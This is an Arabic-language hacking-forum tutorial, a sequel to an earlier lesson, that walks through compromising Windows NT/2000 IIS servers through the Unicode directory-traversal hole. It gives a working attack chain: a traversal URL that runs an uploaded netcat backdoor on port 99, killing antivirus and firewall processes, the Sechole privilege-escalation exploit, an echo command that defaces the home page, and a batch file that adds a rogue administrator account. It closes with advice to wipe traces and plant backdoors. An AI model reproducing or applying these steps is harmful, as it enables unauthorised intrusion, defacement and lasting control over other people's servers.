بسم الله الرحمن الرحيم

بسم الله الرحمن الرحيم ..

الموضوع : تكملة موضوع اليونيكود (الجزء الثاني من درس هكس)

بعد اخذ الاذن من الاخ هكس قررت كتابة تكملة موضوعه السابق الذي استفاد منه الجميع ..
وهو حول ثغرات اليونيكود (ليس اليونيكود فقط!)

ملاحظة : درس هكس كان عبارة عن اوامر اساسية يستطيع الجميع تطبيقها .. اما في هذا الدرس فالأمر يتطلب بعض الذكاء والمهارة ..

---------------
البداية :
--------------

عند وجود موقع مصاب بثغرة ما (يونيكود) فان اول شي عليك القيام به هو نسخ مجلد cmd الى cmd1 بهذه الطريقة :
C+copy+c:\winnt\system32+
c:\winnt\system32\cmd1.exe والسبب هو تفعيل امر الكتابة Echo ..
وبعد ذلك نفذ الثغرة من الملف الجديد CMD1.exe ( هذا شي يعرفه الجميع ) لكن للتذكير فقط !

الان عند تصفحك لملفات الموقع من المتصفح .. من خلال هذه الثغرة فانه سيكون لديك صلاحيات IWAM_USER وهذا المستخدم هو عبارة عن يوزر ينتمي للمجموعه Guest وهو اليوزر المسؤوول عن تشغيل سيرفر IIS .
وبما انه من مجموعة Guest فهو لا يملك صلاحيات كثيرة !! الا اذا تم اعداده بشكل سيء :)

لايوجد شي اكثر ادمانا من محاولة الحصول على رووت :) هذا في انظمة *nix اما في Microsot فالوضع مختلف :) فإن محاولة الحصول على صلاحيات Administrator ليس بالسهولة التي تتوقعها :) فرفع الامتيازات بشكل محلي في انظمة مايكروسوفت ممكن فقط بطرق قليلة لا يتعدى عددها اصابع اليد الواحده .. وانا اكتب هذا الموضوع لاشرح كيفية احكام السيطرة على السيرفر والحصول على حساب مكافيء للمدير :) والتمتع بجميع موارد النظام ..

+ الملفات المطلوبة :
Sechole.exe وملحقاتها .
Kill.exe
Tlist.exe
ncx99.exe
tftpd32.exe

جهز العده :) ..
لتوفير الوقت جمعتها في مجلد واحد هنا
الان سأشرح عمل كل اداة :

1 - Sechole وهو اقوى استثمار موجود لرفع الامتيازات بشكل محلي .. وطريقة عمله (بشكل مبسط) بأنه يعتمد على صدع في نواة ويندوز ان تي .. يستطيع من خلاله اغتصاب عملية تابعه لمدير النظام يقوم من خلالها برفع امتيازاتك :) .

2 - Tlist تقوم بعرض جميع العمليات التي تعمل بالخلفيه .. والفائده منها هو اقفال الفايروول + الانتي فايروس :)
3- Kill.exe عملها متمم للاداة السابقة حيث ستقوم باقفال رقم العملية المستخرج من الاداة السابقة .
3- NCX99 نسخه مطورة من الباكدوور NC ينصت على المنفذ 99
4- TFTP32.exe لنقل الملفات الى السيرفر ..

كل ما سبق كان عبارة عن مقدمه :) اما العمل الحقيقي سيبدأ الان :

اولا قم برفع جميع الادوات السابق الى السيرفر ..
ثم قم بتشغيل ncx99.exe بهذا الشكل مثلا :
http://target/scripts/..À¯../winnt/system32/cmd1.exe?/c+C:\ncx99.exe
بعد ذلك قم بالاتصال بالموقع على البورت 99 ..
ستحصل على سطر اوامر CMD بدون امتيازات = Guest .
الان قم بتشغيل الاداة TLIST .. ستعرض لك جميع العمليات التي تعمل .. قم بالبحث عن رقم العملية PID الخاص بالانتي فايروس ان وجد .. وكذلك اذا وجدت جدار ناري ..
سجل رقم PID الخاص بالانتي فايروس والفايروول على ورقه جانبيه ..
الان قم بقتل الاجراء بالاداة Kill بهذا الشكل : KILL.exe PID .. مكان PID تضع رقم العملية :)
يسأل البعض ! مالهدف من اقفال الانتي فايروس ؟ الاجابة .. أن التحديثات الاخيرة من انتي فايروس تتعامل مع Sechole على انه باكدور .. والان بعد اتمام العمليات السابقة بنجاح .. قم بتشغيل Sechole.exe :) من المتصفح .

عندها سيتم رفم امتيازات IWAM_USER الى مجموعه Administrators ..
الان بإمكانك تنفيذه جميع الاوامر بكامل الحريه وبدون اي مشاكل في الصلاحيات Access Denided .
وطبعا اهم شي الكتابة على الصفحه الرئيسية بامر الايكو :
C+Echo+Hacked+by+XDeMoNX+
> +C;\inetpub\wwwroot\index
.htm

ولكن ليس هذا كل شي ..
القراصنه الاذكياء لا يبحثون فقط عن تغيير الصفحه الرئيسية خصوصا اذا كان الموقع مهم او يحتوي على معلومات او قواعد بيانات ... إلخ :)

سؤال : هل تستطيع الدخول بهذا اليوزر ؟ IWAM_USER الى اي خدمه مثل تلنت او اف تي بي ؟؟
الاجابة : لا .. صحيح اننا قمنا برفع امتيزاته لكننا لا نملك كلمه المرور ! لانه تكون مسنده بشكل عشوائي .
سيذهب تفكير البعض الى الحصول على ملف السام وكسره :) هذا ممكن .. لكن يوجد ماهو اسهل .
بما اننا لدينا حساب مكافي لـ Administrator ولكننا لا نملك كلمة المرور . ما رأيك بإضافه يوزر جديد باسمك مع باسورد خاصه بك مع امتيازات المدير ايضا !! :) قليل من الذكاء والتفكير :)
قم بانشاء مستند نصي جديد واضف السطر التالي :
net user Demon pass /add && net localgroup administrators Demon /add والان Save as واحفظها باسم add.bat .
توضيح : ما فعلناه سابقا هو انشاء مجلد دفعاتي يقوم بانشاء يوزر جديد Demon وكلمة مرور Pass واضافته الى مجموعة الادمنستريتورز :) المدراء ..
قم الان برفع الملف add.bat ثم تشغيلها من المتصفح (بواسطة اليونكود)
الان لديك حساب مدير :) وتستطيع الدخول الى اي خدمه .. اف تي بي او تلنت او نت بيوس او غيرها :)
لا تنسى في النهاية مسح الاثار واضافة الابواب الخلية الخاصة بك لتسهيل الدخول في المرات القادمه :)
طبعا لن اتوسع في هذا الجانب لانه ( لكل شيخ طريقة!) وكل واحد له اسلوب في اخفاء ادواته والتحكم في الملفات .

نرجع لنقطة سابقة ..
هل تذكر اني طلبت منك اقفال الفايروول ؟؟ لماذا ؟
لو جربت تنفذ الامر netstat -an من خلال سطر اوامر الان سي .. فانك ستجد من المنافذ ما يسر القلب :)
90% من السيرفرات اللي دخلتها وكانت محمية بجدران نار :) وجدت المنفذ 139 فيها مفتوحا بدون حمايه :)
لذا فان اقفال الفايرول قد يجعل لك اكثر من خيار لاسقاط الهدف :)

اسف على النحو الاملاء .. والتنسيق الـ أي كلام :) واختصار المعلومات ايضا .
بالامكان الاستعراض اكثر من ذلك بكثير .. الى درجة الحصول على تحكم رسومي GUI .
لكن لم يكون لدي الوقت الكافي .. اذا وجدت وقت فراغ فسأكتب عن طرق اخرى وادوات اخرى مثل GEtAdmin و Sechole2 وكيفية الحصول على تحكم رسومي بواسطه الاداة WINvnc
..

أي استفسارات او أسئلة ؟

تحياتي للجميع / ابـــوخــلــود
Demon_9x@Hotmail.com